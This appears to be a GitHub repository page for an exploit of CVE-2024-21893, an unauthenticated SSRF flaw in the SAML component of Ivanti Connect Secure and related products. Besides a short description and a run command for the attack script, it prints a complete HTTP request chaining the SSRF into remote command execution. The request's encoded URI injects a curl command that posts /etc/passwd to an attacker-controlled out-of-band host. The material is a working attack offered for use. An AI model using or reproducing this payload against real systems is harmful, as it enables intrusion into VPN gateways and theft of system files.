Skip to content

CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure

Notifications You must be signed in to change notification settings

h4x0r-dz/CVE-2024-21893.py

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

CVE-2024-21893 is server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.

run python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com

image

image

RCE

POST /dana-ws/saml20.ws HTTP/1.1
Host: target.com
Accept: */*
Content-Type: text/xml
Content-Length: 934
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<ds:Signature
		xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
			<ds:SignedInfo>
				<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
				<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
			</ds:SignedInfo>
			<ds:SignatureValue>qwerty</ds:SignatureValue>
			<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
				<ds:RetrievalMethod URI="http://127.0.0.1:8090/api/v1/license/keys-status/%3bcurl%20-X%20POST%20-d%20%40%2fetc%2fpasswd%20http%3a%2f%2f8oxxxxxxxxxxxxx.oastify.com%3b"/>
				<ds:X509Data/>
			</ds:KeyInfo>
			<ds:Object></ds:Object>
		</ds:Signature>
	</soap:Body>
</soap:Envelope>

image

Reference : https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis

About

CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages